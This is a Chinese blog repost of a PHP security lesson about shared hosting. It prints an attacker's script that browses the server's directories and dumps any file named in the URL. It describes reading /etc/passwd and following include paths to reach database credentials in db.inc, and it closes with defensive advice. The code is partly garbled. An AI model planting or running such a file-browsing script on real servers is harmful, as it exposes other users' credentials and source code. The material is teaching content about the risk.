php浏览服务器文件,PHP安全编程:主机文件目录浏览

最新推荐文章于 2021-08-10 23:45:54 发布
最新推荐文章于 2021-08-10 23:45:54 发布
阅读量130 收藏
点赞数
文章标签: php浏览服务器文件

除了能在共享服务器上读取任意文件之外,攻击者还能建立一个可以浏览文件系统的脚本。由于你的大多数敏感文件不会保存在网站主目录下,此类脚本一般用于找到你的源文件的所在位置。请看下例:

if (isset($_GET['dir']))

{

ls($_GET['dir']);

}

elseif (isset($_GET['file']))

{

cat($_GET['file']);

}

else

{

ls('/');

}

function cat($file)

{

echo htmlentities(file_get_contents($file), ENT_QUOTES, 'UTF-8'));

}

function ls($dir)

{

$handle = dir($dir);

while ($filename = $handle->read())

{

$size = filesize("$dir$filename");

if (is_dir("$dir$filename"))

{

$type = 'dir';

$filename .= '/';

}

else

{

$type = 'file';

}

if (is_readable("$dir$filename"))

{

$line = str_pad($size, 15);

$line .= "

$line .= "?$type=$dir$filename\">$filename

";

}

else

{

$line = str_pad($size, 15);

$line .= $filename;

}

echo "$line\n";

}

$handle->close();

}

?>

攻击者可能会首先察看/etc/passwd文件或/home目录以取得该服务器上的用户名清单;可以通过语言的结构如include或require来发现保存在网站主目录以外的源文件所在位置。例如,考虑一下下面的脚本文件/home/victim/public_html/admin.php:

include '../inc/db.inc';

/* ... */

?>

如果攻击者设法显示了该文件的源码,就可以发现db.inc的所在位置,同时他可以使用readfile()函数来使其内容暴露,取得了数据库的访问权限。这样,在这个环境中保存db.inc于网站主目录之外的做法并未起到保护作用。

这一攻击说明了为什么要把共享服务器上的所有源文件看成是公开的,并要选择数据库实现所有敏感数据的保存。

延伸阅读

此文章所在专题列表如下:

海盗船舵工-8381
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php 获取ftp服务器目录目录下的所有文件
php_lzr的博客
08-25 1万+
其实这个和循环遍历文件夹下的所有文件类似 但是一些函数不能在这里用 只能用ftp的函数 下面是代码 这个一个ftp类 里面已经封住好方法 大家调用就好 <?php /** * 仿写CodeIgniter的FTP类 * FTP基本操作: * 1) 登陆; connect * 2) 当前目录文件列表; filelist * 3) 目录改变; ...
基于PHP的亚马逊分类目录php版源码.zip
最新发布
01-07
【标题】"基于PHP的亚马逊分类目录php版源码.zip" 涉及的主要知识点是PHP编程语言在构建亚马逊风格的分类目录系统中的应用。这个项目可能是为了帮助开发者理解如何利用PHP来创建一个类似亚马逊的商品分类目录,以便...
php获取服务器文件列表,php将服务端的文件读出来显示在web页面实例
weixin_42509796的博客
03-10 710
本篇文章的内容我将告诉你如何应用php将服务端的文件读出来显示在web页面。现有保存在服务端的文件orders.txt,内容为:现创建vieworder.PHP文件,将其读出并显示;$DOCUMENT_ROOT =$_SERVER['DOCUMENT_ROOT'];?>客户订单我们的商店客户订单//打开文件,(只读模式+二进制模式)@$fp=fopen("$DOCUMENT_ROOT/L02...
php显示服务器中的文件,使用PHP在FTP服务器上显示一个文件
weixin_42347660的博客
08-09 241
我得到一个名为“file.txt”的文件的FTP服务器。在我的网站上,我想用php显示这个文件包含的内容。我得到了什么:使用PHP在FTP服务器上显示一个文件session_start();$_SESSION["ftp_pass"] = $_POST["pass"];$_SESSION["ftp_user"] = $_POST["user"];$ftp_pass = $_POST["pass"];...
php如何查看服务器文件是否存在,如何使用PHP检查远程服务器上是否存在文件?...
weixin_30421043的博客
03-16 154
我用这个,有点简单:// the server you wish to connect to - you can also use the server ip ex. 107.23.17.20$ftp_server = "ftp.example.com";// set up a connection to the server we chose or die and show an error$c...
PHP实例开发源码—DBKiss 数据库浏览工具.zip
11-14
【压缩包子文件文件名称列表】: 132687321046221951 这个文件名可能是由于隐私或安全原因被加密或随机化处理了,通常一个ZIP压缩包会包含多个文件目录,如源代码文件(.php)、样式表(.css)、脚本文件(.js)...
基于PHP的宜乐创意礼品店系统 php版.zip
08-29
【标题】"基于PHP的宜乐创意礼品店系统 php版.zip"揭示了这是一个采用PHP编程语言开发的在线购物平台,特别关注创意礼品的销售。PHP是一种广泛使用的开源脚本语言,尤其适合Web开发,能够创建动态交互式站点。这个...
kodexplorer web文件管理系统 v2.7
04-04
文件浏览:列表模式,图标模式;双击进入子文件夹;地址栏操作;打开文件夹记录逆势操作记录(前进后退) 支持拖拽操作:选中后拖拽,实现剪切到指定文件夹功能 快捷键操作:delete删除,ctrl+A全选,ctrl+C复制,ctrl...
基于PHP的智汀WAP下载站.zip
10-10
【标题】"基于PHP的智汀WAP下载站"指的是一个使用PHP编程语言构建的移动端下载站点。在移动互联网时代,WAP(Wireless Application Protocol)站点是专门为无线设备如手机设计的,提供轻量级的网页浏览服务。这个...
php浏览服务器某一文件夹内容,php删除web服务器中指定目录下的指定格式的文件...
weixin_42138703的博客
03-09 187
今天还在写VipSystem Pro的授权部分,用户授权后,生成匹配该用户的唯一的php文件集合(在一个目录下),然后进行zip下所并弹出下载。这个临时生成的zip文件存放在我指定的一个目录。每个用户授权不同的功能,都会产生一个唯一的zip压缩文件。用户多了,服务器会存放很多zip文件。这时候,就需要设置一个过期时间,删除这些文件。留给用户一个下载有效期。即能保证空间不被过多占用,也能保证授权文件...
php 查看服务器文件是否存在,php读取ftp服务器文件是否存在
weixin_39693662的博客
08-09 490
php读取ftp服务器文件是否存在 内容精选换一换使用vi编辑器打开“/etc/default/grub”,按如下要求修改参数:GRUB_CMDLINE_LINUX参数为console=tty0 console=ttyAMA0,115200GRUB_TERMINAL参数为serialGRUB_SERIAL_COMMAND参数为serial --speed=115200 --unit=0区块链服务状...
php打开服务器文件夹路径,PHP配置文件中代码位置如下:检查WEB根目录是否搭建成功...
weixin_33978578的博客
08-10 478
PHP配置文件中代码位置如下:检查WEB根目录是否搭建成功2021-08-07要求官方下载地址至于我用的版本,已经上传到百度云供大家下载了,这里就不啰嗦了! !安装和普通的应用安装没有太大区别。关键是配置。打开安装路径下的“conf\.conf”文件,这个文件就是我们的配置文件。让我们支持 PHPLoadModule php5_module "D:/wamp/php-5.3.25/php5apac...
php 复制文件到指定目录
热门推荐
muzi187的博客
03-11 1万+
复制一个文件到指定的目录,可自行设置文件目的目录及复制的文件文件名 <?php //复制图片 function file2dir($sourcefile, $dir,$filename){ if( ! file_exists($sourcefile)){ return false; } //$filename = basename($source
php 判断服务器 文件存在,检查服务器上是否存在php文件
weixin_32861907的博客
03-10 268
标签:php我正在寻找一种方法来查看本地服务器上是否存在文件.我通常会使用函数是否存在的情况,但在这种情况下,这不是一个选择.我的问题是我如何获得2才能返回true.1.返回true:$acf_funcs = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/themes/vac3/acf/page_meta/functions.php';var_dump(file...
php开启目录浏览功能,nginx,apache开启文件目录浏览功能
weixin_42533622的博客
03-19 348
我们都知道在apache下可以配置访问web服务器的某个路径时,自动显示其目录下面的文件列表的,其实Nginx一点也不比apache弱,它当然也可以实现这个功能,而且还非常容易和简单;主要用到autoindex 这个参数来开启,其配置如下:复制代码代码如下:location / {root /data/www/file //指定实际目录绝对路径;autoin...
php实现服务器文件夹预览,PHP服务器文件管理器开发小结(七):应用jQueryUI预览服务器图片...
weixin_36411280的博客
04-01 129
上一节讨论了利用jQueryUI实现用户友好的新建、查看和编辑文件的界面。然而,这些界面都是针对纯文本的,如果是图像的话,查看文件仅提供纯文本就很不友好了。因此,需要为前端提供图像浏览的方法。先提供前端JavaScript的代码,首先是“原材料”:然后在onElemAct中添加:case"p_w_picpath":$('#imgView').attr('src',strViewPath);$(...
php打开服务器文件夹,PHP服务器文件管理器开发小结(四):利用SESSION响应文件夹导航...
weixin_30899789的博客
03-25 130
书接上回,在首文件夹(HOME)图标的旁边是回到上级文件夹(UP)和刷新当前文件夹(REFRESH)两个图标,对应的图片链接为:对应的事件代码为:functiononRefresh(){varstrDirName="refresh";varstrEncodedName=escape(strDirName);$.post("query.php",{act:strEncodedName...
PHP 核心编程技术 个人笔记
06-26
"PHP核心编程技术笔记涵盖了表单传值、文件上传、MySQL扩展、HTTP协议和文件编程等多个方面,详细讲解了PHP编程中的关键概念和技术。" 在PHP编程中,表单传值是Web应用中常用的数据传递方式。表单传值包括GET和POST...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值